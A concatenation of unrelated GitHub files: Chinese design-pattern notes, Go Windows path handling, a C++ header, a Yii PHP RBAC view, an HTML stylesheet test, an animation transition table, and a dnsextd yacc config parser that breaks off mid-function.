> 设计模式(Design pattern)代表了最佳的实践,通常被有经验的面向对象的软件开发人员所采用。设计模式是软件开发人员在软件开发过程中面临的一般问题的解决方案。这些解决方案是众多软件开发人员经过相当长的一段时间的试验和错误总结出来的。
设计模式是一套被反复使用的、多数人知晓的、经过分类编目的、代码设计经验的总结。使用设计模式是为了重用代码、让代码更容易被他人理解、保证代码可靠性。 毫无疑问,设计模式于己于他人于系统都是多赢的,设计模式使代码编制真正工程化,设计模式是软件工程的基石,如同大厦的一块块砖石一样。项目中合理地运用设计模式可以完美地解决很多问题,每种模式在现实中都有相应的原理来与之对应,每种模式都描述了一个在我们周围不断重复发生的问题,以及该问题的核心解决方案,这也是设计模式能被广泛应用的原因
### 设计模式的类型
根据设计模式的参考书 **Design Patterns - Elements of Reusable Object-Oriented Software(中文译名:设计模式 - 可复用的面向对象软件元素)** 中所提到的,总共有 23 种设计模式。这些模式可以分为三大类:创建型模式(Creational Patterns)、结构型模式(Structural Patterns)、行为型模式(Behavioral Patterns)
| 序号 | 模式 & 描述 | 包括 |
| ---- | ------------------------------------------------------------ | ------------------------------------------------------------ |
| 1 | **创建型模式** 这些设计模式提供了一种在创建对象的同时隐藏创建逻辑的方式,而不是使用 new 运算符直接实例化对象。这使得程序在判断针对某个给定实例需要创建哪些对象时更加灵活。 | 工厂模式(Factory Pattern)抽象工厂模式(Abstract Factory Pattern)单例模式(Singleton Pattern)建造者模式(Builder Pattern)原型模式(Prototype Pattern) |
| 2 | **结构型模式** 这些设计模式关注类和对象的组合。继承的概念被用来组合接口和定义组合对象获得新功能的方式。 | 适配器模式(Adapter Pattern)桥接模式(Bridge Pattern)过滤器模式(Filter、Criteria Pattern)组合模式(Composite Pattern)装饰器模式(Decorator Pattern)外观模式(Facade Pattern)享元模式(Flyweight Pattern)代理模式(Proxy Pattern) |
| 3 | **行为型模式** 这些设计模式特别关注对象之间的通信。 | 责任链模式(Chain of Responsibility Pattern)命令模式(Command Pattern)解释器模式(Interpreter Pattern)迭代器模式(Iterator Pattern)中介者模式(Mediator Pattern)备忘录模式(Memento Pattern)观察者模式(Observer Pattern)状态模式(State Pattern)空对象模式(Null Object Pattern)策略模式(Strategy Pattern)模板模式(Template Pattern)访问者模式(Visitor Pattern) |
### 设计模式的六大原则
**1、开闭原则(Open Close Principle)**
开闭原则的意思是:**对扩展开放,对修改关闭**。在程序需要进行拓展的时候,不能去修改原有的代码,实现一个热插拔的效果。简言之,是为了使程序的扩展性好,易于维护和升级。想要达到这样的效果,我们需要使用接口和抽象类,
> 实现热插拔,提高扩展性。
**2、里氏代换原则(Liskov Substitution Principle)**
里氏代换原则是面向对象设计的基本原则之一。 里氏代换原则中说,任何基类可以出现的地方,子类一定可以出现。LSP 是继承复用的基石,只有当派生类可以替换掉基类,且软件单位的功能不受到影响时,基类才能真正被复用,而派生类也能够在基类的基础上增加新的行为。里氏代换原则是对开闭原则的补充。实现开闭原则的关键步骤就是抽象化,而基类与子类的继承关系就是抽象化的具体实现,所以里氏代换原则是对实现抽象化的具体步骤的规范。
> 实现抽象的规范,实现子父类互相替换;
**3、依赖倒转原则(Dependence Inversion Principle)**
这个原则是开闭原则的基础,具体内容:针对接口编程,依赖于抽象而不依赖于具体。
> 针对接口编程,实现开闭原则的基础;
**4、接口隔离原则(Interface Segregation Principle)**
这个原则的意思是:使用多个隔离的接口,比使用单个接口要好。它还有另外一个意思是:降低类之间的耦合度。由此可见,其实设计模式就是从大型软件架构出发、便于升级和维护的软件设计思想,它强调降低依赖,降低耦合。
> 降低耦合度,接口单独设计,互相隔离;
**5、迪米特法则,又称最少知道原则(Demeter Principle)**
最少知道原则是指:一个实体应当尽量少地与其他实体之间发生相互作用,使得系统功能模块相对独立。
> 功能模块尽量独立
**6、合成复用原则(Composite Reuse Principle)**
合成复用原则是指:尽量使用合成/聚合的方式,而不是使用继承。
> 尽量使用聚合,组合,而不是继承; | {
"pile_set_name": "Github"
} |
// Copyright 2010 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package filepath
import (
"strings"
"syscall"
)
// isSlash reports whether c is a path separator on Windows: either a
// backslash or a forward slash.
func isSlash(c uint8) bool {
	switch c {
	case '\\', '/':
		return true
	}
	return false
}
// IsAbs reports whether the path is absolute.
//
// On Windows a path is absolute only if it carries a volume name (drive
// letter or UNC prefix) followed immediately by a separator.
func IsAbs(path string) bool {
	vol := volumeNameLen(path)
	if vol == 0 {
		// No drive letter and no UNC prefix: relative.
		return false
	}
	rest := path[vol:]
	if rest == "" {
		// Bare volume such as "C:" is drive-relative, not absolute.
		return false
	}
	return isSlash(rest[0])
}
// volumeNameLen returns length of the leading volume name on Windows.
// It returns 0 elsewhere.
//
// Two forms are recognized: a drive letter ("C:") and a UNC prefix
// (`\\server\share`). For UNC paths the returned length covers the server
// and share components.
func volumeNameLen(path string) int {
	if len(path) < 2 {
		return 0
	}
	// with drive letter
	c := path[0]
	if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') {
		return 2
	}
	// is it UNC
	if l := len(path); l >= 5 && isSlash(path[0]) && isSlash(path[1]) &&
		!isSlash(path[2]) && path[2] != '.' {
		// first, leading `\\` and the next byte must not be another slash or
		// a dot: that byte starts the server name.
		for n := 3; n < l-1; n++ {
			// second, scan for the slash that terminates the server name.
			if isSlash(path[n]) {
				n++
				// third, a non-empty share name must follow immediately; a
				// leading '.' or another slash disqualifies the UNC form.
				if !isSlash(path[n]) {
					if path[n] == '.' {
						break
					}
					// Advance to the end of the share name (next slash or end
					// of string); everything before n is the volume name.
					for ; n < l; n++ {
						if isSlash(path[n]) {
							break
						}
					}
					return n
				}
				break
			}
		}
	}
	return 0
}
// HasPrefix exists for historical compatibility and should not be used.
//
// It first tries a case-sensitive match, then falls back to a simple
// lowercase comparison; it does not respect path element boundaries.
func HasPrefix(p, prefix string) bool {
	return strings.HasPrefix(p, prefix) ||
		strings.HasPrefix(strings.ToLower(p), strings.ToLower(prefix))
}
// splitList splits a PATH-style list on ListSeparator, honoring double
// quotes: separators inside a quoted section do not split, and the quotes
// themselves are stripped from the result.
func splitList(path string) []string {
	// The same implementation is used in LookPath in os/exec;
	// consider changing os/exec when changing this.
	if path == "" {
		return []string{}
	}

	// Split path, respecting but preserving quotes.
	list := []string{}
	begin := 0
	inQuotes := false
	for i := 0; i < len(path); i++ {
		c := path[i]
		if c == '"' {
			inQuotes = !inQuotes
		} else if c == ListSeparator && !inQuotes {
			list = append(list, path[begin:i])
			begin = i + 1
		}
	}
	list = append(list, path[begin:])

	// Now strip the quote characters from every element that has them.
	for i, s := range list {
		if strings.Contains(s, `"`) {
			list[i] = strings.Replace(s, `"`, ``, -1)
		}
	}
	return list
}
// abs returns an absolute representation of path by delegating to the
// Windows GetFullPathName system call via syscall.FullPath.
func abs(path string) (string, error) {
	return syscall.FullPath(path)
}
// join skips any leading empty elements and delegates the rest to
// joinNonEmpty. It returns "" when every element is empty.
func join(elem []string) string {
	for idx := range elem {
		if elem[idx] != "" {
			return joinNonEmpty(elem[idx:])
		}
	}
	return ""
}
// joinNonEmpty is like join, but it assumes that the first element is non-empty.
// It returns the cleaned concatenation of elem, taking care that joining
// ordinary elements never fabricates a UNC path.
func joinNonEmpty(elem []string) string {
	if len(elem[0]) == 2 && elem[0][1] == ':' {
		// First element is drive letter without terminating slash.
		// Keep path relative to current directory on that drive.
		return Clean(elem[0] + strings.Join(elem[1:], string(Separator)))
	}
	// The following logic prevents Join from inadvertently creating a
	// UNC path on Windows. Unless the first element is a UNC path, Join
	// shouldn't create a UNC path. See golang.org/issue/9167.
	p := Clean(strings.Join(elem, string(Separator)))
	if !isUNC(p) {
		return p
	}
	// p == UNC only allowed when the first element is a UNC path.
	head := Clean(elem[0])
	if isUNC(head) {
		return p
	}
	// head + tail == UNC, but joining two non-UNC paths should not result
	// in a UNC path. Undo creation of UNC path.
	tail := Clean(strings.Join(elem[1:], string(Separator)))
	if head[len(head)-1] == Separator {
		return head + tail
	}
	return head + string(Separator) + tail
}
// isUNC reports whether path is a UNC path. A volume name longer than the
// two bytes of a drive letter ("C:") can only be a UNC prefix.
func isUNC(path string) bool {
	return volumeNameLen(path) > 2
}
// sameWord reports whether a and b are equal under Unicode case-folding,
// matching Windows' case-insensitive treatment of path components.
func sameWord(a, b string) bool {
	return strings.EqualFold(a, b)
}
| {
"pile_set_name": "Github"
} |
/*!
@file
@copyright Edouard Alligand and Joel Falcou 2015-2017
(See accompanying file LICENSE.md or copy at http://boost.org/LICENSE_1_0.txt)
*/
#ifndef BRIGAND_HPP_INCLUDED
#define BRIGAND_HPP_INCLUDED
#include <brigand/adapted.hpp>
#include <brigand/algorithms.hpp>
#include <brigand/functions.hpp>
#include <brigand/sequences.hpp>
#include <brigand/types.hpp>
#endif
| {
"pile_set_name": "Github"
} |
<?php
// Assignment management view for the rbac admin module.
//
// Renders two multi-select lists — items available to the user and items
// already assigned — with search boxes and assign/revoke buttons. The lists
// are populated and manipulated client-side by the yii.admin JS helpers
// registered at the bottom of this file.
//
// NOTE(review): the spellings 'Avaliable'/'avaliable' and 'searchAssignmet'
// below are runtime identifiers (translation keys, element ids, and JS method
// names); correcting them would require coordinated changes in the asset
// bundle and translations, so they are intentionally left untouched here.
use yii\helpers\Html;
use backend\modules\rbac\AdminAsset;
use yii\helpers\Json;
use yii\helpers\Url;
/* @var $this yii\web\View */
/* @var $model yii\web\IdentityInterface */
// $usernameField / $idField name the identity attributes to display and to
// key assignments by — presumably passed in by the controller; verify there.
$this->title = Yii::t('rbac-admin', 'Assignments');
$this->params['breadcrumbs'][] = $this->title;
?>
<div class="assignment-index">
    <?= Html::a(Yii::t('rbac-admin', 'Users'), ['index'], ['class' => 'btn btn-success']) ?>
    <h1><?= Yii::t('rbac-admin', 'User') ?>: <?= Html::encode($model->{$usernameField}) ?></h1>
    <div class="row">
        <div class="col-lg-5">
            <div class="input-group">
                <span class="input-group-addon"><?= Yii::t('rbac-admin', 'Avaliable') ?>:</span>
                <input type="text" class="form-control" id="search-avaliable" placeholder="Search">
            </div>
            <select class="form-control" id="list-avaliable" multiple size="20" style="width: 100%">
            </select>
        </div>
        <div class="col-lg-1">
            <br><br>
            <a href="#" id="btn-assign" class="btn btn-success">>></a><br>
            <a href="#" id="btn-revoke" class="btn btn-danger"><<</a>
        </div>
        <div class="col-lg-5">
            <div class="input-group">
                <span class="input-group-addon"><?= Yii::t('rbac-admin', 'Assigned') ?>:</span>
                <input type="text" class="form-control" id="search-assigned" placeholder="Search">
            </div>
            <select class="form-control" id="list-assigned" multiple size="20" style="width: 100%">
            </select>
        </div>
    </div>
</div>
<?php
// Register the admin JS/CSS bundle, then hand the client script the user id
// and the assign/search endpoint URLs it needs.
AdminAsset::register($this);
$properties = Json::htmlEncode([
    'userId' => $model->{$idField},
    'assignUrl' => Url::to(['assign']),
    'searchUrl' => Url::to(['search']),
]);
// Wire up live search on keydown, the assign/revoke buttons, and trigger an
// initial population of both lists. The heredoc body is emitted verbatim.
$js = <<<JS
yii.admin.initProperties({$properties});
$('#search-avaliable').keydown(function () {
    yii.admin.searchAssignmet('avaliable');
});
$('#search-assigned').keydown(function () {
    yii.admin.searchAssignmet('assigned');
});
$('#btn-assign').click(function () {
    yii.admin.assign('assign');
    return false;
});
$('#btn-revoke').click(function () {
    yii.admin.assign('revoke');
    return false;
});
yii.admin.searchAssignmet('avaliable', true);
yii.admin.searchAssignmet('assigned', true);
JS;
$this->registerJs($js);
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<!-- default -->
<html>
<head>
<meta charset="UTF-8">
<title>Test alternative stylesheets</title>
<link rel="stylesheet" href="persistent.css">
<link rel="stylesheet" title="Default" href="default.css">
<link rel="stylesheet" title="Default" href="default2.css">
<link rel="stylesheet alternate" title="Alternative" href="alternative.css">
<link rel="stylesheet alternate" title="Alternative" href="alternative2.css">
<style>
#internal { background: yellow; }
</style>
</head>
<body>
<blockquote id="persistent">persistent</blockquote>
<blockquote id="default">default</blockquote>
<blockquote id="default2">default2</blockquote>
<blockquote id="alternative">alternative</blockquote>
<blockquote id="alternative2">alternative2</blockquote>
<blockquote id="internal">internal</blockquote>
</body>
</html>
| {
"pile_set_name": "Github"
} |
Role State Target TransitionDuration
R2AilaMd010011 Born 0
R2AilaMd010011 Stand2 0.1
R2AilaMd010011 Stand1 0.1
R2AilaMd010011 Stand3 0.1
R2AilaMd010011 Standchange 0.1
R2AilaMd010011 Run 0.1
R2AilaMd010011 Walk 0.1
R2AilaMd010011 Death 0.1
R2AilaMd010011 Hit1 0.05
R2AilaMd010011 Hit2 0.05
R2AilaMd010011 Behitfly 0.05
R2AilaMd010011 Hoverhit 0.05
R2AilaMd010011 Falldown 0.1
R2AilaMd010011 Hitdown 0.1
R2AilaMd010011 Lieonfloor 0.1
R2AilaMd010011 Standup 0.1
R2AilaMd010011 Straight 0.1
R2AilaMd010011 Stun 0.1
R2AilaMd010011 TurnLeft 0.1
R2AilaMd010011 TurnRight 0.1
R2AilaMd010011 StraightBefore 0.1
R2AilaMd010011 StraightAfter 0.1
R2AilaMd010011 UiStand1 0.1
R2AilaMd010011 Win 0
R2AilaMd010011 Win2 0.1
R2AilaMd010011 Runb 0.2
R2AilaMd010011 Runl 0.2
R2AilaMd010011 Runr 0.2
R2AilaMd010011 Stop 0.1
R2AilaMd010011 Walkb 0.1
R2AilaMd010011 Walkl 0.1
R2AilaMd010011 Walkr 0.1
R2AilaMd010011 Fail 0.1
R2AilaMd010011 Save 0.1
R2AilaMd010011 Hit3 0.05
R2AilaMd010011 Hit4 0.05
R2AilaMd010011 RunStart 0.1
R2AilaMd010011 RunStartEnd01 0.1
R2AilaMd010011 Attack01 0.1
R2AilaMd010011 Attack02 0.1
R2AilaMd010011 Attack03 0.1
R2AilaMd010011 Attack04 0.1
R2AilaMd010011 Attack11 0.1
R2AilaMd010011 Attack21 0.1
R2AilaMd010011 Attack31 0.1
R2AilaMd010011 Attack41 0.1
R2AilaMd010011 Attack51 0.1
R2AilaMd010011 Move1 0.1
R2AilaMd010011 Move2 0.1
R2AilaMd010011 Move3 0.1
R2AilaMd010011 AttackQte 0
R2AilaMd010011 Stand2 Standchange 0.1
R2AilaMd010011 Stand2 Run 0.2
R2AilaMd010011 Stand2 Walk 0.3
R2AilaMd010011 Stand2 Walkb 0.3
R2AilaMd010011 Stand2 Walkl 0.3
R2AilaMd010011 Stand2 Walkr 0.3
R2AilaMd010011 Stand1 Run 0.2
R2AilaMd010011 Stand1 Walk 0.1
R2AilaMd010011 Standchange Stand1 0.1
R2AilaMd010011 Standchange Run 0.1
R2AilaMd010011 Standchange Walk 0.1
R2AilaMd010011 Run Stop 0.2
R2AilaMd010011 Run Stand2 0.2
R2AilaMd010011 Run Runb 0.2
R2AilaMd010011 Run Runl 0.2
R2AilaMd010011 Run Runr 0.2
R2AilaMd010011 Walk Stand2 0.1
R2AilaMd010011 Hit1 Stand2 0
R2AilaMd010011 Hit2 Stand2 0
R2AilaMd010011 Behitfly Hoverhit 0.1
R2AilaMd010011 Behitfly Falldown 0.1
R2AilaMd010011 Hoverhit Falldown 0.1
R2AilaMd010011 Falldown Lieonfloor 0.1
R2AilaMd010011 Hitdown Lieonfloor 0.1
R2AilaMd010011 Standup Stand2 0.1
R2AilaMd010011 Straight Stand2 0.1
R2AilaMd010011 Stun Stand2 0.1
R2AilaMd010011 TurnLeft Stand2 0.1
R2AilaMd010011 TurnRight Stand2 0.1
R2AilaMd010011 Win Win2 0.1
R2AilaMd010011 Runb Stand2 0.2
R2AilaMd010011 Runb Run 0.2
R2AilaMd010011 Runb Runl 0.2
R2AilaMd010011 Runb Runr 0.2
R2AilaMd010011 Runl Stand2 0.2
R2AilaMd010011 Runl Run 0.2
R2AilaMd010011 Runl Runb 0.2
R2AilaMd010011 Runl Runr 0.2
R2AilaMd010011 Runr Stand2 0.2
R2AilaMd010011 Runr Run 0.2
R2AilaMd010011 Runr Runb 0.2
R2AilaMd010011 Runr Runl 0.2
R2AilaMd010011 Stop Stand2 0.1
R2AilaMd010011 Walkb Stand2 0.1
R2AilaMd010011 Walkb Walk 0.2
R2AilaMd010011 Walkb Walkl 0.1
R2AilaMd010011 Walkb Walkr 0.1
R2AilaMd010011 Walkl Stand2 0.1
R2AilaMd010011 Walkl Walk 0.1
R2AilaMd010011 Walkl Walkb 0.1
R2AilaMd010011 Walkl Walkr 0.2
R2AilaMd010011 Walkr Stand2 0.1
R2AilaMd010011 Walkr Walk 0.1
R2AilaMd010011 Walkr Walkb 0.1
R2AilaMd010011 Walkr Walkl 0.2
R2AilaMd010011 Hit3 Stand2 0
R2AilaMd010011 Hit4 Stand2 0
R2AilaMd010011 RunStart Run 0
R2AilaMd010011 RunStart RunStartEnd01 0.1
| {
"pile_set_name": "Github"
} |
/* -*- Mode: C; tab-width: 4 -*-
*
* Copyright (c) 2006-2010 Apple Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
%{
/* Prologue: C declarations shared by the generated parser for the dnsextd
 * configuration-file grammar. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "mDNSEmbeddedAPI.h"
#include "DebugServices.h"
#include "dnsextd.h"
void yyerror( const char* error );
int yylex(void);
/* Singly-linked list node used to accumulate strings (listen addresses,
 * referenced key names) while a braced block is being parsed. */
typedef struct StringListElem
{
char * string;
struct StringListElem * next;
} StringListElem;
/* Parsed contents of an "options { ... }" block. Fixed 256-byte buffers. */
typedef struct OptionsInfo
{
char server_address[ 256 ];
int server_port;
char source_address[ 256 ];
int source_port;
int private_port;
int llq_port;
} OptionsInfo;
/* NOTE(review): ZoneInfo appears unused in this grammar — possibly legacy. */
typedef struct ZoneInfo
{
char name[ 256 ];
char certificate_name[ 256 ];
char allow_clients_file[ 256 ];
char allow_clients[ 256 ];
char key[ 256 ];
} ZoneInfo;
/* One parsed TSIG key declaration: key "name" { secret "..."; }; */
typedef struct KeySpec
{
char name[ 256 ];
char algorithm[ 256 ];
char secret[ 256 ];
struct KeySpec * next;
} KeySpec;
/* One parsed zone declaration, linked into g_zones by the zone_set action. */
typedef struct ZoneSpec
{
char name[ 256 ];
DNSZoneSpecType type;
StringListElem * allowUpdate;
StringListElem * allowQuery;
char key[ 256 ];
struct ZoneSpec * next;
} ZoneSpec;
/* Parser-global accumulators filled in by the grammar actions below and
 * consumed by ParseConfig() after yyparse() returns. */
static StringListElem * g_stringList = NULL;
static StringListElem * g_addrList = NULL;
static KeySpec * g_keys;
static ZoneSpec * g_zones;
static ZoneSpec g_zoneSpec;
static const char * g_filename;
/* Makes yyparse() accept a void* argument, visible as `context` in actions. */
#define YYPARSE_PARAM context
void
SetupOptions
(
OptionsInfo * info,
void * context
);
%}
/* Semantic values: NUMBER carries an int; the text-bearing tokens a char*. */
%union
{
int number;
char * string;
}
/* Keyword and punctuation tokens produced by the lexer. */
%token OPTIONS
%token LISTEN_ON
%token NAMESERVER
%token PORT
%token ADDRESS
%token LLQ
%token PUBLIC
%token PRIVATE
%token ALLOWUPDATE
%token ALLOWQUERY
%token KEY
%token ALGORITHM
%token SECRET
%token ISSUER
%token SERIAL
%token ZONE
%token TYPE
%token ALLOW
%token OBRACE
%token EBRACE
%token SEMICOLON
%token IN
/* Tokens that carry text scanned by the lexer. */
%token <string> DOTTED_DECIMAL_ADDRESS
%token <string> WILDCARD
%token <string> DOMAINNAME
%token <string> HOSTNAME
%token <string> QUOTEDSTRING
%token <number> NUMBER
%type <string> addressstatement
%type <string> networkaddress
%%
/* A config file is a (possibly empty) sequence of semicolon-terminated commands. */
commands:
|
commands command SEMICOLON
;
/* Each top-level command is an options block, a zone block, or a key block. */
command:
options_set
|
zone_set
|
key_set
;
options_set:
OPTIONS optionscontent
{
// SetupOptions( &g_optionsInfo, context );
}
;
optionscontent:
OBRACE optionsstatements EBRACE
;
optionsstatements:
|
optionsstatements optionsstatement SEMICOLON
;
optionsstatement:
statements
|
LISTEN_ON addresscontent
{
}
|
LISTEN_ON PORT NUMBER addresscontent
{
// "listen-on port N { a.b.c.d; ... };" — configure the listen address/port.
// Falls back to the standard unicast DNS port when N is 0.
mDNSIPPort listen_port = mDNSOpaque16fromIntVal( $3 );
DaemonInfo* d = ( DaemonInfo* ) context;
d->addr.sin_port = ( listen_port.NotAnInteger) ? listen_port.NotAnInteger : UnicastDNSPort.NotAnInteger;
StringListElem* addr = g_addrList;
// Consume (and free) the address list accumulated by addressstatement.
while (addr != NULL)
{
StringListElem* next;
// The first ipv4 address in {,} is used; the rest are ignored.
if (inet_pton( AF_INET, addr->string, &d->addr.sin_addr ) == 0) {
// NOTE(review): on an invalid listen address the loopback fallback is
// written into d->ns_addr (the nameserver address) rather than d->addr
// (the listen address). Looks like it should be d->addr.sin_addr —
// confirm against upstream before changing.
inet_pton( AF_INET, "127.0.0.1", &d->ns_addr.sin_addr );
LogMsg("LISTEN_ON: An invalid ipv4 address, %s, detected.", addr->string);
}
next = addr->next;
free(addr);
addr = next;
}
}
|
NAMESERVER ADDRESS networkaddress
{
}
|
NAMESERVER ADDRESS networkaddress PORT NUMBER
{
}
|
PRIVATE PORT NUMBER
{
// Port on which dnsextd accepts private (TLS) connections.
( ( DaemonInfo* ) context )->private_port = mDNSOpaque16fromIntVal( $3 );
}
|
LLQ PORT NUMBER
{
// Port used for long-lived query (LLQ) traffic.
( ( DaemonInfo* ) context )->llq_port = mDNSOpaque16fromIntVal( $3 );
}
;
key_set:
KEY QUOTEDSTRING OBRACE SECRET QUOTEDSTRING SEMICOLON EBRACE
{
    // Record a TSIG key declaration: key "name" { secret "base64"; };
    // The key is pushed onto the global g_keys list, which ParseConfig()
    // later resolves against zone allow-update / allow-query key references.
    KeySpec * keySpec;
    keySpec = ( KeySpec* ) malloc( sizeof( KeySpec ) );
    if ( !keySpec )
    {
        LogMsg("ERROR: memory allocation failure");
        YYABORT;
    }
    // BUG FIX: strncpy() does not NUL-terminate when the source is >= the
    // buffer size, leaving keySpec->name / keySpec->secret unterminated for
    // the strcmp()/Base64 calls performed later in ParseConfig(). Copy one
    // byte less and terminate explicitly.
    strncpy( keySpec->name, $2, sizeof( keySpec->name ) - 1 );
    keySpec->name[ sizeof( keySpec->name ) - 1 ] = '\0';
    strncpy( keySpec->secret, $5, sizeof( keySpec->secret ) - 1 );
    keySpec->secret[ sizeof( keySpec->secret ) - 1 ] = '\0';
    keySpec->next = g_keys;
    g_keys = keySpec;
}
;
zone_set:
ZONE QUOTEDSTRING zonecontent
{
    // zone "name" { ... };  — capture the zone name plus the attributes the
    // zonestatement actions accumulated into the global g_zoneSpec.
    ZoneSpec * zoneSpec;
    zoneSpec = ( ZoneSpec* ) malloc( sizeof( ZoneSpec ) );
    if ( !zoneSpec )
    {
        LogMsg("ERROR: memory allocation failure");
        YYABORT;
    }
    // BUG FIX: strncpy() leaves the buffer unterminated when the source is
    // >= the buffer size; terminate explicitly so the name is always a
    // valid C string for MakeDomainNameFromDNSNameString() later.
    strncpy( zoneSpec->name, $2, sizeof( zoneSpec->name ) - 1 );
    zoneSpec->name[ sizeof( zoneSpec->name ) - 1 ] = '\0';
    zoneSpec->type = g_zoneSpec.type;
    strcpy( zoneSpec->key, g_zoneSpec.key );
    zoneSpec->allowUpdate = g_zoneSpec.allowUpdate;
    zoneSpec->allowQuery = g_zoneSpec.allowQuery;
    zoneSpec->next = g_zones;
    g_zones = zoneSpec;
}
|
ZONE QUOTEDSTRING IN zonecontent
{
    // Same as above, for the 'zone "name" IN { ... };' spelling.
    ZoneSpec * zoneSpec;
    zoneSpec = ( ZoneSpec* ) malloc( sizeof( ZoneSpec ) );
    if ( !zoneSpec )
    {
        LogMsg("ERROR: memory allocation failure");
        YYABORT;
    }
    // Same NUL-termination fix as the first alternative.
    strncpy( zoneSpec->name, $2, sizeof( zoneSpec->name ) - 1 );
    zoneSpec->name[ sizeof( zoneSpec->name ) - 1 ] = '\0';
    zoneSpec->type = g_zoneSpec.type;
    strcpy( zoneSpec->key, g_zoneSpec.key );
    zoneSpec->allowUpdate = g_zoneSpec.allowUpdate;
    zoneSpec->allowQuery = g_zoneSpec.allowQuery;
    zoneSpec->next = g_zones;
    g_zones = zoneSpec;
}
;
zonecontent:
OBRACE zonestatements EBRACE
/* NOTE(review): no terminating ';' after the zonecontent rule — yacc accepts
 * this because the following "zonestatements:" unambiguously starts a new
 * production, but adding the ';' would be tidier. */
zonestatements:
|
zonestatements zonestatement SEMICOLON
;
/* Each statement inside a zone block mutates the global g_zoneSpec; the
 * enclosing zone_set action then copies it into a fresh ZoneSpec. */
zonestatement:
TYPE PUBLIC
{
g_zoneSpec.type = kDNSZonePublic;
}
|
TYPE PRIVATE
{
g_zoneSpec.type = kDNSZonePrivate;
}
|
ALLOWUPDATE keycontent
{
// Take ownership of the key-name list accumulated by keystatement.
g_zoneSpec.allowUpdate = g_stringList;
g_stringList = NULL;
}
|
ALLOWQUERY keycontent
{
g_zoneSpec.allowQuery = g_stringList;
g_stringList = NULL;
}
;
addresscontent:
OBRACE addressstatements EBRACE
{
}
addressstatements:
|
addressstatements addressstatement SEMICOLON
{
}
;
/* Collect each dotted-decimal address into the global g_addrList; the
 * LISTEN_ON action consumes and frees the list. */
addressstatement:
DOTTED_DECIMAL_ADDRESS
{
StringListElem * elem;
elem = ( StringListElem* ) malloc( sizeof( StringListElem ) );
if ( !elem )
{
LogMsg("ERROR: memory allocation failure");
YYABORT;
}
elem->string = $1;
elem->next = g_addrList;
g_addrList = elem;
}
;
keycontent:
OBRACE keystatements EBRACE
{
}
keystatements:
|
keystatements keystatement SEMICOLON
{
}
;
/* Collect each "key some.domain.name" reference into g_stringList; the
 * ALLOWUPDATE / ALLOWQUERY actions take ownership of the list. */
keystatement:
KEY DOMAINNAME
{
StringListElem * elem;
elem = ( StringListElem* ) malloc( sizeof( StringListElem ) );
if ( !elem )
{
LogMsg("ERROR: memory allocation failure");
YYABORT;
}
elem->string = $2;
elem->next = g_stringList;
g_stringList = elem;
}
;
/* A network address is a literal IPv4 address, a hostname, or a wildcard. */
networkaddress:
DOTTED_DECIMAL_ADDRESS
|
HOSTNAME
|
WILDCARD
;
/* Generic brace-delimited block; used via "statements" to recognize (and
 * otherwise ignore) content inside the options block. */
block:
OBRACE zonestatements EBRACE SEMICOLON
;
statements:
|
statements statement
;
statement:
block
{
$<string>$ = NULL;
}
|
QUOTEDSTRING
{
// Pass the scanned string through unchanged.
$<string>$ = $1;
}
%%
int yywrap(void);
extern int yylineno;
/* Report a parse error to stderr, prefixed with the config file name and the
 * lexer's current line number. */
void yyerror( const char *str )
{
fprintf( stderr,"%s:%d: error: %s\n", g_filename, yylineno, str );
}
/* Tell the lexer there is no further input once EOF is reached. */
int yywrap()
{
return 1;
}
/* Parse the dnsextd configuration file `file` and (re)populate d->zones.
 *
 * Frees any zones already attached to `d`, runs the yacc parser (which fills
 * the g_zones / g_keys globals via the grammar actions above), then builds a
 * DNSZone per parsed ZoneSpec, resolving every allow-update / allow-query key
 * name against the parsed key declarations.
 *
 * Returns 0 on success, 1 on parse / allocation / key-lookup failure.
 */
int
ParseConfig
(
DaemonInfo * d,
const char * file
)
{
extern FILE * yyin;
DNSZone * zone;
DomainAuthInfo * key;
KeySpec * keySpec;
ZoneSpec * zoneSpec;
int err = 0;
g_filename = file;
// Tear down the current zone specifiers
zone = d->zones;
while ( zone )
{
DNSZone * next = zone->next;
key = zone->updateKeys;
while ( key )
{
DomainAuthInfo * nextKey = key->next;
free( key );
key = nextKey;
}
key = zone->queryKeys;
while ( key )
{
DomainAuthInfo * nextKey = key->next;
free( key );
key = nextKey;
}
free( zone );
zone = next;
}
d->zones = NULL;
yyin = fopen( file, "r" );
// NOTE(review): err stays 0 (success) when the file cannot be opened —
// presumably a missing config file is deliberately treated as "no config";
// confirm, since every other failure path below sets err = 1.
require_action( yyin, exit, err = 0 );
err = yyparse( ( void* ) d );
require_action( !err, exit, err = 1 );
// Materialize each parsed ZoneSpec as a DNSZone hung off d->zones.
for ( zoneSpec = g_zones; zoneSpec; zoneSpec = zoneSpec->next )
{
StringListElem * elem;
mDNSu8 * ok;
zone = ( DNSZone* ) malloc( sizeof( DNSZone ) );
require_action( zone, exit, err = 1 );
memset( zone, 0, sizeof( DNSZone ) );
zone->next = d->zones;
d->zones = zone;
// Fill in the domainname
ok = MakeDomainNameFromDNSNameString( &zone->name, zoneSpec->name );
require_action( ok, exit, err = 1 );
// Fill in the type
zone->type = zoneSpec->type;
// Fill in the allow-update keys
for ( elem = zoneSpec->allowUpdate; elem; elem = elem->next )
{
mDNSBool found = mDNSfalse;
// Resolve the referenced key name against the parsed "key" declarations.
for ( keySpec = g_keys; keySpec; keySpec = keySpec->next )
{
if ( strcmp( elem->string, keySpec->name ) == 0 )
{
DomainAuthInfo * authInfo = malloc( sizeof( DomainAuthInfo ) );
mDNSs32 keylen;
require_action( authInfo, exit, err = 1 );
memset( authInfo, 0, sizeof( DomainAuthInfo ) );
ok = MakeDomainNameFromDNSNameString( &authInfo->keyname, keySpec->name );
if (!ok) { free(authInfo); err = 1; goto exit; }
keylen = DNSDigest_ConstructHMACKeyfromBase64( authInfo, keySpec->secret );
if (keylen < 0) { free(authInfo); err = 1; goto exit; }
authInfo->next = zone->updateKeys;
zone->updateKeys = authInfo;
found = mDNStrue;
break;
}
}
// Log this
